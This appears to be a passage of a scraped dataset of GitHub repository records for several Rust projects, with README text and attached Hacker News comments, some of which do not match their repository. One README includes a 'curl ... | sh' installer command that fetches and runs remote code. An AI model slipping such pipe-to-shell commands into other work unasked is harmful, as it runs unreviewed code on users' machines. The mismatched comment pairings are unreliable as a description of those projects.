enabled solely based on legitimate interest [1].Nothing against your service or the myriad other privacy-friendly analytics services, which arguably are more privacy-friendly than Google Analytics, I wouldn't take legal advice from them though as clearly they're often interpreting legislation generously in their favor as well. Unfortunately we're long past the point where people can rely on any vendor being factually correct, it's just about who can shout their truth the loudest (which is bad for publishers as they might be the ones getting fined for relying on these claims).1: https://www.degruyter.com/document/doi/10.1515/icom-2020-000...so what about an Italian person visiting a Portuguese website that uses GA. What is the legality there?Xerox \u2013 a simple and opinionated tool to build your own zineZ-eye-n or z-ee-n?I know its from magazine but I always default to z-eye-n pronunciation.I have a pet peeve when someone names a technology like this. A zine is an existing concept for cheap printed magazine like material. When you name your tech the exact same thing then there's no differentiation when I search something like \"Zine how to\".Are there any example magazines that are in English?We live in a world where everyone and their dog (sometimes literally) fights for your attention. 
If you are trying to advertise something comparable to a blog or magazine creation software, add a screenshot on what to expect at least.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "TheWaWaR/simple-http-server", "link": "https://github.com/TheWaWaR/simple-http-server", "tags": ["static", "file", "server", "simplehttpserver", "http", "rust"], "stars": 818, "description": "Simple http server in Rust (Windows/Mac/Linux)", "lang": "Rust", "repo_lang": "", "readme": "# What does it look like?\n\n### Screenshot\n\n\n### Command Line Arguments\n```\nSimple HTTP(s) Server 0.6.3\n\nUSAGE:\n simple-http-server [FLAGS] [OPTIONS] [--] [root]\n\nFLAGS:\n --coep Add \"Cross-Origin-Embedder-Policy\" HTTP header and set it to \"require-corp\"\n --coop Add \"Cross-Origin-Opener-Policy\" HTTP header and set it to \"same-origin\"\n --cors Enable CORS via the \"Access-Control-Allow-Origin\" header\n -h, --help Prints help information\n -i, --index Enable automatic render index page [index.html, index.htm]\n --nocache Disable http cache\n --norange Disable header::Range support (partial request)\n --nosort Disable directory entries sort (by: name, modified, size)\n -s, --silent Disable all outputs\n -u, --upload Enable upload files (multiple select) (CSRF token required)\n -V, --version Prints version information\n\nOPTIONS:\n -a, --auth HTTP Basic Auth (username:password)\n --cert TLS/SSL certificate (pkcs#12 format)\n --certpass TLS/SSL certificate password\n -c, --compress ...\n Enable file compression: gzip/deflate\n Example: -c=js,d.ts\n Note: disabled on partial request!\n --ip IP address to bind [default: 0.0.0.0]\n -p, --port Port number [default: 8000]\n --redirect takes a URL to redirect to using HTTP 301 Moved Permanently\n -t, --threads How many worker threads [default: 3]\n --try-file \n serve this file (server root relative) in place of missing files (useful for single page apps) [aliases:\n try-file-404]\n -l, --upload-size-limit Upload file size limit [bytes] [default: 8000000]\n\n\n```\n\n# Installation\n\n### Download binary \n[Goto Download](https://github.com/TheWaWaR/simple-http-server/releases)\n\n - windows-64bit\n - osx-64bit\n - linux-64bit\n\n\n### Install by cargo\n\n``` bash\n# Install Rust\ncurl https://sh.rustup.rs -sSf | sh\n\n# Install simple-http-server\ncargo install simple-http-server\nrehash\nsimple-http-server -h\n```\n\n# Features\n- [x] Windows support (with colored log)\n- [x] Specify listen address (ip, port)\n- [x] Specify running threads\n- [x] Specify root directory\n- [x] Pretty log\n- [x] Nginx like directory view (directory entries, link, filesize, modified date)\n- [x] Breadcrumb navigation\n- [x] (default enabled) Guess mime type\n- [x] (default enabled) HTTP cache control\n - Sending Last-Modified / ETag\n - Replying 304 to If-Modified-Since\n- [x] (default enabled) Partial request\n - Accept-Ranges: bytes([ByteRangeSpec; length=1])\n - [Range, If-Range, If-Match] => [Content-Range, 206, 416]\n- [x] (default disabled) Automatic render index page [index.html, index.htm]\n- [x] (default disabled) Upload file\n - A CSRF token is generated when upload is enabled and must be sent as a parameter when uploading a file\n- [x] (default disabled) HTTP Basic Authentication (by username:password)\n- [x] Sort by: filename, filesize, modified\n- [x] HTTPS support\n- [x] Content-Encoding: gzip/deflate\n- [x] Added CORS headers support\n- [x] Silent mode\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", 
"gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "nuta/nsh", "link": "https://github.com/nuta/nsh", "tags": ["cli", "rust", "shell"], "stars": 818, "description": "A command-line shell like fish, but POSIX compatible.", "lang": "Rust", "repo_lang": "", "readme": "nsh\n====\n![CI Status](https://github.com/nuta/nsh/workflows/CI/badge.svg?branch=master)\n[![Latest version](https://img.shields.io/crates/v/nsh.svg)](https://crates.io/crates/nsh)\n\nA command-line shell that focuses on productivity and swiftness featuring:\n\n- A POSIX compliant interactive shell with some Bash extensions.\n- Tab completions and syntax highlighting.\n- Bash completion support (by internally invoking the genuine Bash).\n- Builtin zero configration features.\n- Written in Rust :crab:\n\n![screenshot](https://gist.githubusercontent.com/nuta/5747db6c43978d9aa1941ce321cc1741/raw/405b7a1156292fd0456010b657f299b1daa367ff/nsh.png)\n\nInstallation\n------------\n```\n$ cargo install nsh\n```\n\nDocumentation\n-------------\n**[Documentation](https://github.com/nuta/nsh/tree/master/docs)**\n\nWhy create a new shell?\n-----------------------\nBash is the best for executing shell scripts but its interactive mode is not satisfactory. I am\na zsh user for the last decade but I don't need *customizability* and got tired of making my zshrc\nfaster. Fish is really neat but I prefer old-fashioned, traditional, and ergonomic shell syntax.\n\nContributing\n------------\nnsh is in *alpha* stage: there are many missing features which Bash provides, there are kludges in\nsource code, and there must be bugs. To make nsh practical for daily use, I need your help!\n\n### How can I contribute?\n- **Report bugs** in [GitHub issues](https://github.com/nuta/nsh/issues). Please attach\n a minimal reproducible example (e.g. shell script) *if possible*. It helps me to fix the bug easier.\n- **Suggest enhancements** in [GitHub issues](https://github.com/nuta/nsh/issues).\n- **Submit a Pull Request** which implements a new feature, fixes a bug, refactors code, rephrases sentences in documentation, etc.\n\nLicense\n-------\nCC0 or MIT. Choose whichever you prefer.\n", "readme_type": "markdown", "hn_comments": "I've been having a blast writing plain old HTML templates for the past few weeks. It's a traditional Django app. I also use plain old CSS instead of frameworks like Tailwind (well, I use Bootstrap, but I don't use its utility classes).It's practical, pragmatic, and allows me to ship faster.Fresh does this, but I don't know who's using it in production, other than possibly the Deno people.https://fresh.deno.dev/docs/introduction> Even if you use React in small areas where it pulls its weight but generally try and stick to simplicity of sending plain ol' HTMLThe reason why so many apps use React/Vue/whatever for everything is because this hybrid setup is far from simple. It leaves you with two different ways of rendering views, which creates unnecessary context switching for developers, and the interface between the two is often ugly and complicated and prone to memory leaks if you're not careful. 
It also prevents you from taking advantage of the most powerful patterns in these frameworks, which rely on the assumption that it's running as a single page app.The fact is, if your app has functions that require a JavaScript framework to work, the most straightforward answer is to build the whole app in that framework, rather than trying to cobble together multiple front end systems.Considering their stack, I'd say probably GitHub?Remix Run is what you want[dead]Been working on a html over the wire library in Go: https://github.com/livefir/fir. It mostly works but still work in progressHow timely, I, too, am in the market for a new job and I've noticed that ridiculous new buzz of \"HTML over the wire\" or related to \"over/on the wire\". Thanks for writing this.It is quite easy to say \u201cyou should definitely use x\u201d by giving examples of simple applications. however, the vast majority of examples given will turn the app into a soup if you want to do a thorough study. If you're happy with this soup, it's up to you. So enjoy your soups and stop criticizing the useful things people produce with empty arguments. If you have a worthy alternative, offer them. Please stop suggesting things like htmx as alternatives.Where I work we're currently developing an administration / employee-only pages using server-side Blazor.I don't know if this counts as \"HTML over the wire\" because server-side Blazor contains some magic to make the page kinda-sorta act like AJAX. It's a little laggy, but for our purposes, it's \"good enough.\"(The customer-facing pages are going to be SPAs, for very good reasons.)https://optirtc.com/company/careers/Well I'm glad I've discovered HTMx with this thread, I will try it out with my next project, really tired of SPAs and their bulkinessold man alert Back in my day, we wrote ASP.NET that was all server-side-rendered HTML. Once in a while we got REAL FANCY and used JQuery to make PARTIAL HTML requests and update only FRAGMENTS of the page. Hooboy I knew that fashion was cyclical but not tech!We embraced Hotwire with a Clojure backend. Favorite things:- One language model (i.e. no JS, just our favorite backend language)- Extremely minimal front-end tooling- All data is manipulated with the same tools- No client-side routing, validation, or... really much at allP.S. We even wrote our own import-maps solution to avoid needing a JS bundler for the small stuff you can't do without JS.All companies using Elixir / LiveView, there are quite a fewhttps://www.otto.de/I used them this week for the first time and was impressed by the responsiveness on my phone. I looked into the network tab and what I saw was an over-the-wire solution.However, I'm sure that you can also achieve responsiveness this without HTML over the wire. I scimmed a few blog posts, and it seemed to me like they use Java EE, although I'm not entirely sure.People have gotten way too religious over SPAs, SSR, etc.Should you use X? Maybe it depends. I have been burned by using SSR when the complexity of the app increased and suddenly doing SSR was getting in the way and now I was uncomfortably mixing JS with server rendered pages and struggling to maintain state. I've also been on the other side, using React and creating more complexity than was needed.The point is: don't be dogmatic. 
Get requirements, extrapolate what could happen in the future, use first principles, weigh decisions against team capabilities, ask yourself if your decisions are for your own personal reasons or have significant positive user/business impact.Engineers who rush to use one technology over the other without doing their homework are just doing bad engineering. It has nothing to do with \"fighting the good fight\".My last gig used Rails' Hotwire, and my new gig is using Phoenix Liveview.Thankfully people are waking up and seeing that JS is most appropriate as a \"last resort\" technology.We\u2019re using Hotwire extensively at https://mailpace.comIt\u2019s a joy! But we\u2019re not hiring\u2026lol. We're going to end up with xslt again aren't we, it's just a matter of time.For those mentioning frameworks that update the page by getting HTML from the server and patching it into the page: how do you deal with server-client skew?It depends... are you delivering mostly static content or creating and interactive application front-end? Most sites are somewhere in the middle and so should the responses.For me, if it's an application ui/ux, then the rendering should be almost exclusively on the front-end. It's just delivered via a web server instead of installed. Yeah, it's larger than server-sent. It's also emphatically not tying up server resources for template processing, instead using the super computer on your desk or in your pocket.I frankly feel ill when I see more than a couple hundred kb of compressed JS go over the wire... why a couple hundred, that's just where I draw the line... React + MUI with some optimizations and all the application logic should easily fit in under 300k compressed payload. If you're going over that, you're probably doing something very, very wrong. Not that you can't go much smaller and hand crafted. It's a trade-off.I also think edge development tools like Cloudflare Workers and Deno are exceedingly nice and can seriously bridge the gap closer to server rendered, but still not the same as a lot of classic legacy apps.On the flip side, I look at how much memory and resources applications use on a server as it is... They're often massively under-utilized as well. So who knows. I just know that there's nothing wrong in using the client's system to render the client.100% JS fatigue after having worked as a professional full-stack JS dev for 8 years. \nUsing Phoenix LiveView to build our MVP: https://github.com/dwyl/mvp haven\u2019t written JS in months (except maintaining old Open Source packages) don\u2019t miss it at all.I work for a B2B SaaS and we use Ruby on Rails with Hotwire and it's great!Almost zero JS (no Vue.js, no React, or else).I'm building a webapp[0] for turning Clickup docs into static sites, using CF Workers. There isn't a framework for Workers that has the flexibility I need, so I home-rolled one that only sends rendered HTML over the wire. Async components are supported too, so if I have a particularly data-intensive component the renderer just inlines a tiny JS script that sends a request to the worker again, which then returns just that component in HTML.Could be worth releasing on its own as a GitHub project![0] https://intenso.appIs \u201cHTML over the wire\u201d a new buzzword for SSR or is there a difference I'm missing?You can also go to the extreme of \"jpeg over the wire\". 
Your \"web browser\" could probably be implemented in <1000 lines of of code ;) No state, no cookies, no million lines of bundled JavaScript.We use htmx + Node, and we are hiring. PM me on Twitter @alexblearnsEschew developer fashion (and fashion contrarianism) and use the best tool for the job. It doesn't make sense to pick the tool before you even know what problem you're trying to solve.You don't even need a fancy \"send html fragments over the wire\" approach to create a better user and developer experience.Just sending full pages, server side rendered, like Hacker News and Wikipedia do is fine:Going from the HN homepage to this topic we are on: 36 KB in 5 requests.\n\nGoing from the Wikipedia Homepage to an article: 824 KB in 25 requests\n\nGoing from the AirBnB homepage to an apartment listing: 11.4 MB in 265 requests.\n\nGoing from the Reddit homepage to a Reddit thread: 3.74 MB in 40 requests\n\nIn comparison to AirBnB and Reddit, HN and Wikipedia feel blazingly fast. And I am sure the developer experience is an order of magnitude nicer as well.I think I get it. You really don't want to shift your mind to the browser. Your mind is in the server, you know what's up in there, and distributed systems are complicated, so one of the ends should be made as dumb as possible. I get it.Except, guess where the mind of the user is? On the other side of the browser. Embrace the browser, server people, it's closer to the user!Most of us are small-time businesses that never bought the overcomplexification of anything and we were constantly shamed about it. \"Server-side-rendering\" is still a laughable phrase though.SPA is to manage \"CLIENT\" side state, not about server-related stuff ?Look for companies that use Rails, Phoenix, or Laravel.Laminar (Scala framework) hasn't been mentioned yet so dropping it here as an awesome framework that support HTML-over-the-wire. It can be used together with React, HTMX, and many other frontend frameworks -- but doesn't have to be.https://laminar.dev/When I use apps like this - GitLab - I am struck by how much wasted user time such an approach leads to. Everything is a page refreshSend me some counter examples? Im a big SPA fan and there\u2019s lots of good examplesIsn't making a request for almost any user interaction a bit too much?I am more in favour of BE telling FE what to render. I honestly believe many apps could be simplified with better abstractions than hard coding html into messy components. Not saying it's a great approach for super complex layouts, of course.This seems like a good time to ask web people to stop using the private unicode range for icons. It's bad practice because downloadable fonts are considered optional, and there is no fallback equivalent to alt text for undefined glyphs.I was just watching a talk about htmx which is awesome looking. i'm a rails guy myself so i am really interested in using hotwire in some projects. 
htmx looks like a very nice crossplatform approach.https://htmx.org/Here is the talk:\nhttps://htmx.org/essays/a-real-world-react-to-htmx-port/In the Go world, the only implementation I personally know of is in Kyoto, but that tool has still a long way to go.I'd be happy to learn of other Go tools using this.Browsing HN on lynx (not logged in, haven't figured out cookie jar, settings, etc) in the early morning, it was a completely different experience: a dark screen, monocolored text, and comments.It felt like a darkened cafe of inquisitive, sometimes humorous--at turns indignant or snarky--conversation: even intimate, close-quarters, sipping at coffee or wine.That's what I miss about HN's past feature: we can't browse to a segment of a day. The front page changes across twenty-four hours, an ebb and flow of ephemeral delights.I guess that's what I'll set lynx with next: sessions, printing, and a way to quickly save snippets of text. The comments are so valuable for follow-up.I understand your frustration. I feel the same way. I think the web development landscape has become unnecessarily complex. I sometimes miss how simple it used to be to just throw some PHP files together and have a working website up and running. Granted, those \u201csimple\u201d websites came with their own set of issues (especially security-wise), but I still miss that simplicity.Over the past 10-ish years alone, I\u2019ve watched web development go through so many phases, it\u2019s not even funny. Anyone remember gulp.js? Well, I remember a time when every conference talk mentioned it and you were weird if you didn\u2019t use it. Backbone.js anyone?In my experience, I\u2019ve found that most folks can\u2019t even tell you WHY they use React or insert JavaScript framework here.Not too long ago, I was stepping through some \u201chello world\u201d code for a trendy framework and the amount of code that was touched just to write \u201chello world\u201d in the browser felt absolutely ridiculous to me.Let me stop myself before I go on a prolonged rant . . .Anyway, all that said, this is why I\u2019m a fan of SvelteKit (Svelte) and Remix (React). I think they provide a decent balance of modern features while building on native web features/protocols properly.I have been using Blazor for projects in the last year. It's okay (still immature). It uses Websockets when available (HTTP fallback) to transfer the rendered page.I'm building a completely native HTML spa app over at lona.so (just html + js web components and i bundle it myself). Still very much so early days but check it out!FWIW most of the companies using Phoenix (Elixir) that I've talked with are sending HTML over the wire, either with LiveView or traditional Views.We are using Django+HTMX for internal applications.Some random tips:- Write a \"Django context processor\" to inspect requests for \"Hx-Request\" header, and set a \"base_template\" variable accordingly. This means that any template that {% extends base_template %} will react to being a full page or just a fragment and you don't even have to think about that in your view logic. 
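A minimal sketch of the context-processor tip above, assuming HTMX's `HX-Request` header and hypothetical module and template names:\n\n```python\n# myapp/context_processors.py (hypothetical path); register it under\n# TEMPLATES -> OPTIONS -> context_processors in settings.py.\n\ndef base_template(request):\n # HTMX sets the HX-Request: true header on requests it initiates,\n # so serve a bare fragment base in that case.\n if request.headers.get(\"HX-Request\") == \"true\":\n return {\"base_template\": \"_fragment.html\"}\n # Regular navigation: serve the full page shell.\n return {\"base_template\": \"base.html\"}\n```\n\nAny template can then do `{% extends base_template %}` and react to being a full page or just a fragment, as the comment describes.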
Great for progressive enhancement.- You can get reactive JS elements (for example, a d3.js viz that updates when new data comes in) in a few lines of inline JS by using MutationObserver, and \"abusing\" HTMX by using views that return JSON targeting a \n \n \n\n```\n\nA simple `Plot` component would look as follows, using `Yew` as an example frontend framework:\n\n```rust\nuse plotly::{Plot, Scatter};\nuse yew::prelude::*;\n\n\n#[function_component(PlotComponent)]\npub fn plot_component() -> Html {\n let p = yew_hooks::use_async::<_, _, ()>({\n let id = \"plot-div\";\n let mut plot = Plot::new();\n let trace = Scatter::new(vec![0, 1, 2], vec![2, 1, 0]);\n plot.add_trace(trace);\n\n async move {\n plotly::bindings::new_plot(id, &plot).await;\n Ok(())\n }\n });\n\n \n use_effect_with_deps(move |_| {\n p.run();\n || ()\n }, (),\n );\n \n\n html! {\n
\n }\n}\n```\n\nMore detailed standalone examples can be found in the [examples/](https://github.com/igiagkiozis/plotly/tree/master/examples) directory.\n\n# Crate Feature Flags\n\nThe following feature flags are available:\n\n### `kaleido`\n\nAdds plot save functionality to the following formats: `png`, `jpeg`, `webp`, `svg`, `pdf` and `eps`.\n\n### `plotly_image`\n\nAdds trait implementations so that `image::RgbImage` and `image::RgbaImage` can be used more directly with the `plotly::Image` trace.\n\n### `plotly_ndarray`\n\nAdds support for creating plots directly using [ndarray](https://github.com/rust-ndarray/ndarray) types.\n\n### `wasm`\n\nEnables compilation for the `wasm32-unknown-unknown` target and provides access to a `bindings` module containing wrappers around functions exported by the plotly.js library.\n\n# Contributing\n\n* If you've spotted a bug or would like to see a new feature, please submit an issue on the [issue tracker](https://github.com/igiagkiozis/plotly/issues).\n\n* Pull requests are welcome, see the [contributing guide](https://github.com/igiagkiozis/plotly/blob/master/CONTRIBUTING.md) for more information.\n\n# License\n\n`Plotly.rs` is distributed under the terms of the MIT license.\n\nSee [LICENSE-MIT](https://github.com/igiagkiozis/plotly/blob/master/LICENSE-MIT), and [COPYRIGHT](https://github.com/igiagkiozis/plotly/blob/master/COPYRIGHT) for details.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "servo/core-foundation-rs", "link": "https://github.com/servo/core-foundation-rs", "tags": [], "stars": 696, "description": "Rust bindings to Core Foundation and other low level libraries on Mac OS X and iOS", "lang": "Rust", "repo_lang": "", "readme": "# core-foundation-rs\n\n[![Build Status](https://travis-ci.com/servo/core-foundation-rs.svg?branch=master)](https://travis-ci.com/servo/core-foundation-rs)\n\n## Compatibility\n\nTargets macOS 10.7 by default.\n\nTo enable features added in macOS 10.8, set Cargo feature `mac_os_10_8_features`. To have both 10.8 features and 10.7 compatibility, also set `mac_os_10_7_support`. Setting both requires weak linkage, which is a nightly-only feature as of Rust 1.19.\n\nFor more experimental but more complete generated bindings, take a look at https://github.com/michaelwu/RustKit.\n\n## Contributing\n\nIf you wish to start contributing or even make a one-off change, simply submit a pull request with the code or documentation change and we'll go from there.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "dragonflyoss/image-service", "link": "https://github.com/dragonflyoss/image-service", "tags": ["container", "container-image", "accelerator", "snapshotter", "containerd", "docker", "filesystem", "storage"], "stars": 695, "description": "Nydus - the Dragonfly image service, providing fast, secure and easy access to container images.", "lang": "Rust", "repo_lang": "", "readme": "# Nydus: Dragonfly Container Image Service\n
\n[![Release Version](https://img.shields.io/github/v/release/dragonflyoss/image-service?style=flat)](https://github.com/dragonflyoss/image-service/releases)\n[![License](https://img.shields.io/crates/l/nydus-rs)](https://crates.io/crates/nydus-rs)\n\n[![Smoke Test](https://github.com/dragonflyoss/image-service/actions/workflows/smoke.yml/badge.svg?event=schedule)](https://github.com/dragonflyoss/image-service/actions/workflows/ci.yml)\n[![Image Conversion](https://github.com/dragonflyoss/image-service/actions/workflows/convert.yml/badge.svg?event=schedule)](https://github.com/dragonflyoss/image-service/actions/workflows/convert.yml)\n[![Release Test Daily](https://github.com/dragonflyoss/image-service/actions/workflows/release.yml/badge.svg?event=schedule)](https://github.com/dragonflyoss/image-service/actions/workflows/release.yml)\n[![Twitter](https://img.shields.io/twitter/url?style=social&url=https%3A%2F%2Ftwitter.com%2Fdragonfly_oss)](https://twitter.com/dragonfly_oss)\n[![Nydus Stars](https://img.shields.io/github/stars/dragonflyoss/image-service?label=Nydus%20Stars&style=social)](https://github.com/dragonflyoss/image-service)\n\n## Introduction\nThe nydus project implements a content-addressable filesystem on top of the RAFS format that improves the current OCI image specification in terms of container launching speed, image space, and network bandwidth efficiency, as well as data integrity.\n\nThe following benchmarking result shows the performance improvement compared with the OCI image for the container cold startup elapsed time on containerd. As the OCI image size increases, the startup time of a container using a Nydus image remains very short.\n\n![Container Cold Startup](./misc/perf.jpg)\n\nNydus' key features include:\n\n- Container images can be downloaded on demand in chunks for lazy pulling to boost container startup\n- Chunk-based content-addressable data de-duplication to minimize storage, transmission and memory footprints\n- Merged filesystem tree in order to remove all intermediate layers as an option\n- In-kernel EROFS or FUSE filesystem together with overlayfs to provide full POSIX compatibility\n- E2E image data integrity check, so security issues like a \"supply chain attack\" can be avoided and detected at runtime\n- Compatible with the OCI artifacts spec and distribution spec, so nydus images can be stored in a regular container registry\n- Native [eStargz](https://github.com/containerd/stargz-snapshotter) image support with the remote snapshotter plugin `nydus-snapshotter` for the containerd runtime\n- Various container image storage backends are supported. 
\n- Integrated with the CNCF incubating project Dragonfly to distribute container images in a P2P fashion and mitigate the pressure on container registries\n- Capable of prefetching data blocks before user I/O hits them, reducing read latency\n- Records file access patterns at runtime, gathering access traces/logs by which abnormal user behaviors are easily caught\n- Access-trace-based prefetch table\n- User I/O amplification to reduce the number of small requests to the storage backend\n\nCurrently Nydus includes the following tools:\n\n| Tool | Description |\n| ---- | ----------- |\n| [nydusd](https://github.com/dragonflyoss/image-service/blob/master/docs/nydusd.md) | Nydus user-space daemon; it processes all fscache/FUSE messages from the kernel and parses Nydus images to fulfill those requests |\n| [nydus-image](https://github.com/dragonflyoss/image-service/blob/master/docs/nydus-image.md) | Converts a single layer of an OCI-format container image into a nydus-format container image, generating the meta part file and the data part file respectively |\n| [nydusify](https://github.com/dragonflyoss/image-service/blob/master/docs/nydusify.md) | Pulls an OCI image down and unpacks it, invokes `nydus-image create` to convert the image, and then pushes the converted image back to the registry and data storage |\n| [nydusctl](https://github.com/dragonflyoss/image-service/blob/master/docs/nydus-image.md) | Nydusd CLI client (`nydus-image inspect`); queries the daemon's working status/metrics and configures it |\n| [ctr-remote](https://github.com/dragonflyoss/image-service/tree/master/contrib/ctr-remote) | An enhanced `containerd` CLI tool enabling nydus support with `containerd` ctr |\n| [nydus-docker-graphdriver](https://github.com/nydusaccelerator/docker-nydus-graphdriver) | [Experimental] Works as a `docker` remote graph driver to control how images and containers are stored and managed |\n| [nydus-overlayfs](https://github.com/dragonflyoss/image-service/tree/master/contrib/nydus-overlayfs) | `Containerd` mount helper to invoke overlayfs mount, tweaking the mount options a bit so that nydus prerequisites can be passed to vm-based runtimes |
\n| [nydus-backend-proxy](./contrib/nydus-backend-proxy/README.md) | A simple HTTP server to serve a local directory as a blob backend for nydusd |\n\nCurrently Nydus supports the following platforms in the container ecosystem:\n\n| Type | Platform | Description | Status |\n| ---- | -------- | ----------- | ------ |\n| Storage | Registry/OSS/S3/NAS | Support for OCI-compatible distribution implementations such as Docker Hub, Harbor, GitHub GHCR, Aliyun ACR, NAS, and Aliyun OSS-like object storage services | \u2705 |\n| Storage/Build | [Harbor](https://github.com/goharbor/acceleration-service) | Provides a general service for Harbor to support accelerated image conversion based on accelerators like Nydus, eStargz, etc. | \u2705 |\n| Distribution | [Dragonfly](https://github.com/dragonflyoss/Dragonfly2) | Improves the runtime performance of Nydus images even further with the Dragonfly P2P data distribution system | \u2705 |\n| Build | [Buildkit](https://github.com/moby/buildkit/blob/master/docs/nydus.md) | Provides the ability to build and export Nydus images directly from a Dockerfile | \u2705 |\n| Runtime | Kubernetes | Run Nydus images using the CRI interface | \u2705 |\n| Runtime | [Containerd](https://github.com/containerd/nydus-snapshotter) | Nydus Snapshotter, a containerd remote plugin to run Nydus images | \u2705 |\n| Runtime | [CRI-O / Podman](https://github.com/containers/nydus-storage-plugin) | Run Nydus images with CRI-O or Podman | \ud83d\udea7 |\n| Runtime | [Docker](https://github.com/nydusaccelerator/docker-nydus-graphdriver) | [Experimental] Run Nydus images in Docker containers with the graphdriver plugin | \ud83d\udea7 |\n| Build/Runtime | [Nerdctl](https://github.com/containerd/nerdctl/blob/master/docs/nydus.md) | The containerd client to build or run Nydus images (requires the nydus snapshotter) | \u2705 |\n| Runtime | [KataContainers](https://github.com/kata-containers/kata-containers/blob/main/docs/design/kata-nydus-design.md) | Run Nydus images in KataContainers as a native solution | \u2705 |\n| Runtime | [EROFS](https://www.kernel.org/doc/html/latest/filesystems/erofs.html) | Run Nydus images directly with in-kernel EROFS for even greater performance | \u2705 |\n\nTo try the nydus image service:\n\n1. Convert an original OCI image to a nydus image and store it somewhere like Docker/Registry, NAS, Aliyun/OSS or S3. This can be done directly by `nydusify`. Normal users don't have to get involved with `nydus-image`.\n2. Get `nydus-snapshotter` (`containerd-nydus-grpc`) installed locally and configured properly, or install the `nydus-docker-graphdriver` plugin.\n3. Operate containers in the usual ways, for example with `docker`, `nerdctl`, `crictl` and `ctr`.
\n\n## Build Binary\n\n```shell\n# build debug binary\nmake\n# build release binary\nmake release\n# build static binary with docker\nmake docker-static\n```\n\n## Quick Start with Kubernetes and Containerd\n\nFor more details on how to lazily start a container with `nydus-snapshotter` and a nydus image on Kubernetes nodes, or to use `nerdctl` locally rather than CRI, please refer to [Nydus Setup](./docs/containerd-env-setup.md).\n\n## Build Nydus Image\n\nBuild a Nydus image from a directory source: [Nydus Image Builder](./docs/nydus-image.md).\n\nConvert an OCIv1 image to a Nydus image: [Nydusify](./docs/nydusify.md), [Acceld](https://github.com/goharbor/acceleration-service) or [Nerdctl](https://github.com/containerd/nerdctl/blob/master/docs/nydus.md#build-nydus-image-using-nerdctl-image-convert).\n\n## Nydus Snapshotter\n\nNydus-snapshotter is a non-core sub-project of containerd.\n\nCheck out its code and tutorial from the [Nydus-snapshotter repository](https://github.com/containerd/nydus-snapshotter).\nIt works as a `containerd` remote snapshotter to help set up the container rootfs with nydus images, handling the nydus image format when necessary. When running without nydus images, it is identical to containerd's builtin overlayfs snapshotter.\n\n## Run Nydusd Daemon\n\nNormally, users do not need to start `nydusd` by hand. It is started by `nydus-snapshotter` when a container rootfs is prepared.\n\nRun the Nydusd daemon to serve Nydus images: [Nydusd](./docs/nydusd.md).\n\n## Run Nydus with in-kernel EROFS filesystem\n\nIn-kernel EROFS has been fully compatible with the RAFS v6 image format since Linux 5.16. In other words, uncompressed RAFS v6 images can be mounted over block devices since then.\n\nSince [Linux 5.19](https://lwn.net/Articles/896140), EROFS has added a new file-based caching (fscache) backend. In this way, compressed RAFS v6 images can be mounted directly with the fscache subsystem, even when such images are only partially available. `estargz` can be converted on the fly and mounted in this way too.\n\nGuide to running Nydus with fscache: [Nydus-fscache](./docs/nydus-fscache.md)\n\n## Run Nydus with Dragonfly P2P system\n\nNydus is deeply integrated with the [Dragonfly](https://d7y.io/) P2P system, which can greatly reduce network latency and the single point of network pressure on the registry server. Testing in a production environment shows that using Dragonfly can reduce network latency by more than 80%. To understand the performance test data and how to configure Nydus to use Dragonfly, please refer to the [doc](https://d7y.io/docs/setup/integration/nydus).\n\n## Accelerate OCI image directly with Nydus\n\nNydus is able to generate a tiny artifact called a `nydus zran` from an existing OCI image in a short time. This artifact can be used to accelerate container boot time without the need for a full image conversion. For more information, please see the [documentation](./docs/nydus-zran.md).\n\n## Build Images via Harbor\n\nNydus cooperates with the Harbor community to develop [acceleration-service](https://github.com/goharbor/acceleration-service), which provides a general service for Harbor to support image acceleration based on kinds of accelerators like Nydus, eStargz, etc.\n\n## Run with Docker\n\nAn **experimental** plugin helps to start Docker containers from nydus images. For more detailed instructions, please refer to [Docker Nydus Graph Driver](https://github.com/nydusaccelerator/docker-nydus-graphdriver).
\n\n## Run with macOS\n\nNydus can also run with macfuse (a.k.a. osxfuse). For more details, please read [nydus with macOS](./docs/nydus_with_macos.md).\n\n## Run eStargz image (with lazy pulling)\n\nThe containerd remote snapshotter plugin [nydus-snapshotter](https://github.com/containerd/nydus-snapshotter) can be used to run nydus images, or to run [eStargz](https://github.com/containerd/stargz-snapshotter) images directly by appending the `--enable-stargz` command line option.\n\nIn the future, `zstd::chunked` can work in this way as well.\n\n## Documentation\n\nBrowse the documentation to learn more. Here are some topics you may be interested in:\n\n- [A Nydus Tutorial for Beginners](./docs/tutorial.md)\n- [Nydus Design Doc](./docs/nydus-design.md)\n- Our talk at Open Infra Summit 2020: [Toward Next Generation Container Image](https://drive.google.com/file/d/1LRfLUkNxShxxWU7SKjc_50U0N9ZnGIdV/view)\n- [EROFS, What Are We Doing Now For Containers?](https://static.sched.com/hosted_files/kccncosschn21/fd/EROFS_What_Are_We_Doing_Now_For_Containers.pdf)\n- [The Evolution of the Nydus Image Acceleration](https://d7y.io/blog/2022/06/06/evolution-of-nydus/) \\([Video](https://youtu.be/yr6CB1JN1xg)\\)\n- [Introduction to Nydus Image Service on In-kernel EROFS](https://static.sched.com/hosted_files/osseu2022/59/Introduction%20to%20Nydus%20Image%20Service%20on%20In-kernel%20EROFS.pdf) \\([Video](https://youtu.be/2Uog-y2Gcus)\\)\n\n## Community\n\nNydus aims to form a **vendor-neutral, open-source** image distribution solution for all communities.\nQuestions, bug reports, technical discussions, feature requests and contributions are always welcome!\n\nWe're always pleased to hear about your use cases.\nFeel free to reach/join us via Slack and/or Dingtalk.\n\n- **Slack:** [Nydus Workspace](https://join.slack.com/t/nydusimageservice/shared_invite/zt-pz4qvl4y-WIh4itPNILGhPS8JqdFm_w)\n\n- **Twitter:** [@dragonfly_oss](https://twitter.com/dragonfly_oss)\n\n- **Dingtalk:** [34971767](https://qr.dingtalk.com/action/joingroup?code=v1,k1,ioWGzuDZEIO10Bf+/ohz4RcQqAkW0MtOwoG1nbbMxQg=&_dt_no_comment=1&origin=11)\n\n- **Technical Meeting:** Every Wednesday at 06:00 UTC (Beijing, Shanghai 14:00); please see our [HackMD](https://hackmd.io/@Nydus/Bk8u2X0p9) page for more information.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", 